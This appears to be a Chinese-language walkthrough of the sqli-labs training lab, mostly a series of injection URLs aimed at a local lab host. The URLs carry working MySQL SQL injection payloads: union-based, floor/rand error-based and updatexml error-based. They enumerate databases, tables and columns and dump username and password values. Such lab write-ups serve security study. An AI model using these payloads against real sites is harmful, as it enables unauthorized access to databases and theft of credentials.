sql-libs(2) 数字型
经测试,发现是数字型的注入,直接 and 1=1 返回正常,and1=2返回错误,感觉比第一关更加简单一点啊,,透~
经测试order by 为 3 。
1. union 注入
http://192.168.48.130/sqli-labs-master/Less-2/?id=-1 union select 1,database(),version()
得到当前数据库为security ,mysql版本5.5.53
查找所有的数据库:http://192.168.48.130/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(schema_name) from information_schema.schemata),version()
查找security 数据库下的所有表名:http://192.168.48.130/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479),version()
查找user数据表下的所有列名:http://192.168.48.130/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),version()
查找username和password字段下的值:http://192.168.48.130/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(username,0x3a,password) from users),version()
2. floor报错注入
公式:and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a)
查询当前数据库:http://192.168.48.130/sqli-labs-master/Less-1/?id=1' and (select 1 from (select count(*),concat((database()),floor(rand(0)*2))x from information_schema.tables group by x)a)
查找第一个数据库,通过Limit来控制:
http://192.168.48.130/sqli-labs-master/Less-1/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
这边我们叉查找的是security数据库下的users数据表:
http://192.168.48.130/sqli-labs-master/Less-1/?id=z1' and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
这边查找的是security数据库下users表下的字段:
http://192.168.48.130/sqli-labs-master/Less-1/?id=z1' and (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_name=0x7573657273 limit 9,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
查找username字段下的值:http://192.168.48.130/sqli-labs-master/Less-1/?id=z1' and (select 1 from (select count(*),concat((select username from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
3.updatexml 注入
查找数据库:http://192.168.48.130/sqli-labs-master/Less-1/?id=z1' and updatexml(1,concat(0x7e,(SELECT schema_name from information_schema.schemata limit 8,1),0x7e),1)--+
爆security数据库下的数据表:http://192.168.48.130/sqli-labs-master/Less-1/?id=z1' and updatexml(1,concat(0x7e,(SELECT table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1),0x7e),1)--+
查找users表下的字段:http://192.168.48.130/sqli-labs-master/Less-1/?id=z1' and updatexml(1,concat(0x7e,(SELECT column_name from information_schema.columns where table_name=0x7573657273 limit 9,1),0x7e),1)--+
查找字段username的值:
http://192.168.48.130/sqli-labs-master/Less-1/?id=z1' and updatexml(1,concat(0x7e,(SELECT username from users limit 0,1),0x7e),1)--+